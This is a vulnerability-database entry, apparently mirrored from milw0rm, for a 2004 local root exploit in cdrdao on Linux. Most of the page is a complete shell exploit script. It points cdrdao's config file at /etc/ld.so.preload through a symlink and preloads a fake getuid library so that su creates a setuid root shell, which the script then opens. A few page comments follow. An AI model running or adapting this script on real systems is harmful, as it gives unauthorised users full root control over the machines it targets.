CDRDAO – Local Privilege Escalation
漏洞ID | 1054589 | 漏洞类型 | |
发布时间 | 2004-09-07 | 更新时间 | 2004-09-07 |
CVE编号 | N/A |
CNNVD-ID | N/A |
漏洞平台 | Linux | CVSS评分 | N/A |
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#!/bin/sh
DIR=`pwd`
echo ""
echo "cdrdao local root exploit - gr doesn't protect you this time"
echo "Karol Wiêsek <appelast*drumnbass.art.pl>"
echo ""
sleep 2
umask 000
echo -n "[*] Checking if /etc/ld.so.preload doesn't exist ... "
if [ -f /etc/ld.so.preload ]; then
echo "WRONG"
echo "/etc/ld.so.preload exists, write another exploit ;P"
exit
else
echo "OK"
fi
echo -n "[*] Checking if su is setuid ... "
if [ -u /bin/su ];then
echo "OK"
else
echo "WRONG"
exit
fi
echo -n "[*] Creating evil *uid() library ... "
cat > getuid_lib.c << _EOF
int getuid(void) {
return 0; }
_EOF
gcc -o getuid_lib.o -c getuid_lib.c
ld -shared -o getuid_lib.so getuid_lib.o
rm -f getuid_lib.c getuid_lib.o
if [ -f ./getuid_lib.so ]; then
echo "OK"
else
echo "WRONG"
fi
echo -n "[*] Creating suidshell ... "
cat > suid.c << _EOF
int main(void) {
setgid(0); setuid(0);
unlink("./suid");
execl("/bin/sh","sh",0); }
_EOF
gcc -o suid suid.c
rm -f suid.c
if [ -x ./suid ];then
echo "OK"
else
echo "WRONG"
exit
fi
echo -n "[*] Exploiting cdrdao ... "
ln -sf /etc/ld.so.preload $HOME/.cdrdao
if [ ! -L $HOME/.cdrdao ];then
echo "Could'n link to $HOME/.cdrdao"
exit
fi
cdrdao unlock --save 2>/dev/null
>/etc/ld.so.preload
echo "$DIR/getuid_lib.so" > /etc/ld.so.preload
su - -c "rm /etc/ld.so.preload; chown root:root $DIR/suid; chmod +s $DIR/suid"
if [ -s ./suid ];then
echo "OK"
else
echo "WRONG"
exit
fi
rm -f getuid_lib.so
unlink $HOME/.cdrdao
echo "Entering rootshell ... ;]"
./suid
# milw0rm.com [2004-09-07]
相关推荐: cPanel Guestbook.cgi Remote Command Execution Vulnerability
cPanel Guestbook.cgi Remote Command Execution Vulnerability 漏洞ID 1100808 漏洞类型 Input Validation Error 发布时间 2003-02-19 更新时间 2003-02-…
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
喜欢就支持一下吧
恐龙抗狼扛1年前0
kankan啊啊啊啊3年前0
66666666666666